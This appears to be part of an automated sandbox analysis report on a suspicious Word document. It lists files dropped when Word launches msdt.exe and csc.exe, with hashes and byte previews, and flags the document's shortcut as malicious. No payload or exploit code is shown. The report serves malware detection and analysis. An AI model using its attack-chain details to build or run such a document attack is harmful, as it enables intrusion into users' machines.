                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3584
                                                                                                                                                                  Entropy (8bit):3.0894243037017937
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:etGS289pz1qlkCe745Q7GslPor/jvX5ekjV4gztkZfDy6Iv+G3OBWI+ycuZhNOYR:624pqb927GslPYDRjyJDo+k1ulta3xq
                                                                                                                                                                  MD5:E8C0FA4508D78119FF809C4675C6265B
                                                                                                                                                                  SHA1:E8A9831C41F7A75A33CFA84D6EC3A5ED0C7DEF0B
                                                                                                                                                                  SHA-256:4A72E1BB7D525DBF80CF6512BA41318BD099F1375001A57D5BAFB9156DBFD341
                                                                                                                                                                  SHA-512:C784FAFB1F563B05964A18A4E583C6BCB0FCAF54558523A383FC4352DC4DA609F04EB6A0D586B24E584F3D15D2212B0947336F37BC9F64A060F4737835B8168F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\v2wr4cux\CSCB2D03E94AB5B4EC2978640D7F4BF95DE.TMP

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                  Entropy (8bit):3.1211826026087652
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryDak7YnqqvPN5Dlq5J:+RI+ycuZhNRakSvPNnqX
                                                                                                                                                                  MD5:3E6BBBACD72E4B99FC0F060707336B1A
                                                                                                                                                                  SHA1:85E8943C358F1F11699361C58F6239DF37861D8A
                                                                                                                                                                  SHA-256:FC83CB02D7A38658EAAD87D64EF9BE72BA20DCC7C6E72140CEE540DE4609B34D
                                                                                                                                                                  SHA-512:45E87AAFA08C6BAE978EB9EF2B3B3B525748DDED0EE7F05CABEFE222DFA617889FC3F4040A18F7AA5DF26841418FACB5D249ECF19B252D34E432B911C31DC37C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.2.w.r.4.c.u.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.2.w.r.4.c.u.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\v2wr4cux\v2wr4cux.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                  Entropy (8bit):4.794851800702162
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:lKqedmYoNKvUTCSH3gR8H8FgwSHwBGkwZYPaSJ365OlieMjQZaRRnIjzK:cElNK8TCSfHyPGkwZ+vKOGQZMnD
                                                                                                                                                                  MD5:E32070FDBD00F62C1DF9DDC38949CAAE
                                                                                                                                                                  SHA1:2E7F4609290FD5D0E532DC003ACFB9DC2B67070A
                                                                                                                                                                  SHA-256:FD53F5EB54136D023E720CD72DFAFEFB326C3F1B1851757D7AF4AF8FDE8E2F0B
                                                                                                                                                                  SHA-512:4C14927C745B7CF62D5608C0217B758EEEDA02D8F5F445EFCB76A86282BDFFC2B45D661350BD99F6FF93476F80317F734E233078A39886261BB0A968FDBEE981
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y..b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*

                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\icRTA4gcSe.docx.LNK

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 16 20:38:43 2022, mtime=Thu Aug 18 08:02:04 2022, atime=Thu Aug 18 08:01:45 2022, length=11588, window=hide
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1060
                                                                                                                                                                  Entropy (8bit):4.714770982213462
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:85AMjUbNuElPCH2CE5U0YP28+WE4eF3oiQkcLujEjAJ/20XaDmfkcLMNDTDog5op:85uUwAiQnqUAJO04onoDYgys7aB6m
                                                                                                                                                                  MD5:FFD82FB04D33D8318B4D4455D96165E8
                                                                                                                                                                  SHA1:FC3249B1045B8594310C08F83EF258D38D2679B4
                                                                                                                                                                  SHA-256:F154D97970BAF310B5AACB082EE6D4C1B92FCD4FA3006B0E0ABFE76CE2E9941D
                                                                                                                                                                  SHA-512:1B8CEDE1D57E05E1CADE6F6CCD6385CBEE625A6F12BCCF84E9894FFD46FCC6F18AACAAC62B9DAE41FB3CE7B0DA8F4D201FD1443B37D79D00493B81E9513DDF56
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:L..................F.... ....].......0./......$...D-...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...U0H....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1......U...user.<.......Ny..U0H.....S....................t...h.a.r.d.z.....~.1......U...Desktop.h.......Ny..U0H.....Y..............>.......@.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2.D-...U7H .ICRTA4~1.DOC..P.......U..U7H.....R....................>.#.i.c.R.T.A.4.g.c.S.e...d.o.c.x.......U...............-.......T...........>.S......C:\Users\user\Desktop\icRTA4gcSe.docx..&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.i.c.R.T.A.4.g.c.S.e...d.o.c.x.........:..,.LB.)...As...`.......X.......358075...........!a..%.H.VZAj.................-..!a..%.H.VZAj.................-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1

                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):82
                                                                                                                                                                  Entropy (8bit):4.727809061035338
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:bDuMJlUGBkRMAAGJFSmxWHgiRMAAGJFSv:bC6GJFKiGJFc
                                                                                                                                                                  MD5:D7F6284D8D590DBA1443A4813889CAB0
                                                                                                                                                                  SHA1:8E0FD4FEF1FDC9DF82D72C05DA1E02DD1A8BA2F3
                                                                                                                                                                  SHA-256:B8D768C3152D7814F59E77E7BD01C64DDFEBF9FD01FE9A869CB286E5C0FD3ECB
                                                                                                                                                                  SHA-512:05A4624E699F5B552FDDDBB43B58D85ABC87C7BA7D9BA51AC0B0E3D9A140E4A6F1958B026E45323A64763A09C77F3025583C7C556A9D0BE11765242018DDED9B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[folders]..Templates.LNK=0..icRTA4gcSe.docx.LNK=0..[misc]..icRTA4gcSe.docx.LNK=0..

                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                  Entropy (8bit):2.1725311211591296
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Rl/Zd3ztlqKW9kwzlllHlqKSalplB:RtZB6owztIMlB
                                                                                                                                                                  MD5:2B274BA5850BD0A2F120E4E0A71D96D8
                                                                                                                                                                  SHA1:B9E9FD5EDC681D31DF77BAFB2A88313A6A633999
                                                                                                                                                                  SHA-256:8DB9D9FC82380272AC78A93CA0AC8FBAB195618BFA42C2807F049A5074761F3F
                                                                                                                                                                  SHA-512:00B3BF6BCC4E45A8DCDEEEFF9EDA825EA50F2CFAB07F5E3F3E84544A2A9A01E4BCCE5333015F5C300C4E23E3011B134D721797EE5DDEF9447838A53352399590
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.pratesh................................................p.r.a.t.e.s.h.........?aM.............$.......6C......3a1.............$.......6C......7a5.............$...

                                                                                                                                                                  C:\Users\user\Desktop\~$RTA4gcSe.docx

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                  Entropy (8bit):2.1725311211591296
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Rl/Zd3ztlqKW9kwzlllHlqKSalplB:RtZB6owztIMlB
                                                                                                                                                                  MD5:2B274BA5850BD0A2F120E4E0A71D96D8
                                                                                                                                                                  SHA1:B9E9FD5EDC681D31DF77BAFB2A88313A6A633999
                                                                                                                                                                  SHA-256:8DB9D9FC82380272AC78A93CA0AC8FBAB195618BFA42C2807F049A5074761F3F
                                                                                                                                                                  SHA-512:00B3BF6BCC4E45A8DCDEEEFF9EDA825EA50F2CFAB07F5E3F3E84544A2A9A01E4BCCE5333015F5C300C4E23E3011B134D721797EE5DDEF9447838A53352399590
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.pratesh................................................p.r.a.t.e.s.h.........?aM.............$.......6C......3a1.............$.......6C......7a5.............$...

                                                                                                                                                                  C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\DiagPackage.diagpkg

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):24702
                                                                                                                                                                  Entropy (8bit):4.37978533849437
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                  MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                  SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                  SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                  SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..

                                                                                                                                                                  C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\DiagPackage.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):66560
                                                                                                                                                                  Entropy (8bit):6.926109943059805
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                  MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                  SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                  SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                  SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\RS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):50242
                                                                                                                                                                  Entropy (8bit):4.932919499511673
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                  MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                  SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                  SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                  SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp

                                                                                                                                                                  C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\TS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16946
                                                                                                                                                                  Entropy (8bit):4.860026903688885
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                  MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                  SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                  SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                  SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ

                                                                                                                                                                  C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\VF_ProgramCompatibilityWizard.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):453
                                                                                                                                                                  Entropy (8bit):4.983419443697541
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                  MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                  SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                  SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                  SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....

                                                                                                                                                                  C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\en-US\CL_LocalizationData.psd1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6650
                                                                                                                                                                  Entropy (8bit):3.6751460885012333
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                  MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                  SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                  SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                  SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.

                                                                                                                                                                  C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\en-US\DiagPackage.dll.mui

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                  Entropy (8bit):3.517898352371806
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                  MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                  SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                  SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                  SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\result\results.xsl

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):48956
                                                                                                                                                                  Entropy (8bit):5.103589775370961
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                  MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                  SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                  SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                  SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="

                                                                                                                                                                  Static File Info

                                                                                                                                                                  General

                                                                                                                                                                  File type:Microsoft Word 2007+
                                                                                                                                                                  Entropy (8bit):7.342099959599253
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                  • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                  • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                  File name:icRTA4gcSe.docx
                                                                                                                                                                  File size:11588
                                                                                                                                                                  MD5:9873ccaccab0237bf533324f69dff3b3
                                                                                                                                                                  SHA1:29d098d9ddf7e425413817089beb2eb14c91bc64
